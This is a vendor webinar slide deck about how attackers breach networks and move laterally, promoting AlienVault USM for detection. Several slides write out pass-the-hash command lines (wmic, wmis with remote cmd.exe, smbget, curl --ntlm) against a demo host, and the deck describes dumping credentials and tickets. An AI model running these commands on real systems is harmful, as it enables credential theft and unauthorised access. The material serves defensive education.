Live Demo: Get Complete Security Visibility in Under 1 Hour

@AlienVault

About AlienVault

AlienVault has unified the security products, intelligence and community essential for mid-sized businesses to defend against

today’s modern threats

@AlienVault

The breach – common ways attackers get in

What they do next to infiltrate the network

Why detecting their movements is tricky

Demo: How to detect attackers moving stealthily around your network with AlienVault USM

Agenda

@AlienVault

Client-side vulnerabilities exploited by:• Malicious website, i.e. watering hole attacks• Malicious email attachment

Gives attackers access to the local system with privileges of the local user

The Breach

@AlienVault

Grab credentials of cached users

Browse the domain

Exfiltrate data

What happens next

@AlienVault

Windows Credentials EditorAllows an attacker to list Windows logon sessions and add, change, list and delete associated credentials• Pass-The-Hash on Windows machines• Grab NTLM credentials from cached memory• Grab Kerberos tickets from Windows machines• Dump cleartext passwords stored by Windows authentication

packages

But how is this possible?

@AlienVault

Pass the Hash for using credentials in crafty ways• WMIC (Windows Management Instrumentation Command-line)

- Used to issue queries like running processes- wmic -U demo/administrator%hash //172.16.1.1 "select csname,name,processid,sessionid

from win32_process”

But how is this possible?

@AlienVault

Pass the Hash - using credentials in crafty ways (WMIS)• WMIS (Windows Metadata and Internet Services)

- Can be used to create processes, sky is the limit with this attack vector- wmis -U demo/administrator%hash //172.16.1.1 'cmd.exe /c dir c:\ > c:\windows\temp\

blog.txt’

But how is this possible?

@AlienVault

Pass the Hash - using credentials in crafty ways (SMBGET)

• SMBGET can pull files from Windows using a hash for the password- smbget -w demo -u demo\\administrator -O -p <hash>

smb://172.16.1.1/c$/windows/temp/blog.txt

But how is this possible?

@AlienVault

CURL• Pass the hash and we can view a default sharepoint page, logged in as

john.smith• curl --ntlm -u john.smith:<hash> http://intranet.demo.local/Pages/

Default.aspx

But how is this possible?

@AlienVault

Pass the Hash Toolkit• There is also a toolkit for Windows with several pass the hash utilities

But how is this possible?

@AlienVault

Tricky to detect because…

Firewall won’t catch it• Exploiting client side vulnerabilities causes the victim’s machine to initiate a

connection back to the attacker’s server• Attacker’s domain browsing activities are also originating from the victim’s

machine inside the networkAnti-virus is unlikely to catch it• 82,000 new malware variants released every day*

No suspicious authentication failures• Cached credentials are used to browse the domain so the attacker doesn’t

need to guess passwords

So, what will catch it?Network Intrusion Detection and effective correlation

How do you detect this?

*http://www.pcworld.com/article/2109210/report-average-of-82-000-new-malware-threats-per-day-in-2013.html

@AlienVault

powered by AV Labs Threat

Intelligence

USMASSET DISCOVERY• Active Network Scanning• Passive Network Scanning• Asset Inventory• Host-based Software

Inventory

VULNERABILITY ASSESSMENT• Continuous

Vulnerability Monitoring• Authenticated /

Unauthenticated Active Scanning

BEHAVIORAL MONITORING• Log Collection• Netflow Analysis• Service Availability Monitoring

SECURITY INTELLIGENCE• SIEM Event Correlation• Incident Response

THREAT DETECTION• Network IDS• Host IDS• Wireless IDS• File Integrity Monitoring

USM Product Capabilities

@AlienVault

Unified Security Management

Complete. Simple. Affordable.

Delivery Options: Hardware, Virtual, or Cloud-based appliances

Starting at only $3600Open-Source version (OSSIM) also available

AlienVault USM provides asset discovery, vulnerability assessment, threat detection, behavioral monitoring & SIEM in one, pre-integrated platform, plus:

AlienVault Labs Threat Intelligence AlienVault Open Threat Exchange

More Questions? Email

Hello@alienvault.com

NOW FOR SOME Q&A…

Test Drive AlienVault USMDownload a Free 30-Day Trial

http://www.alienvault.com/free-trial

Try our Product Sandbox

http://www.alienvault.com/live-demo-site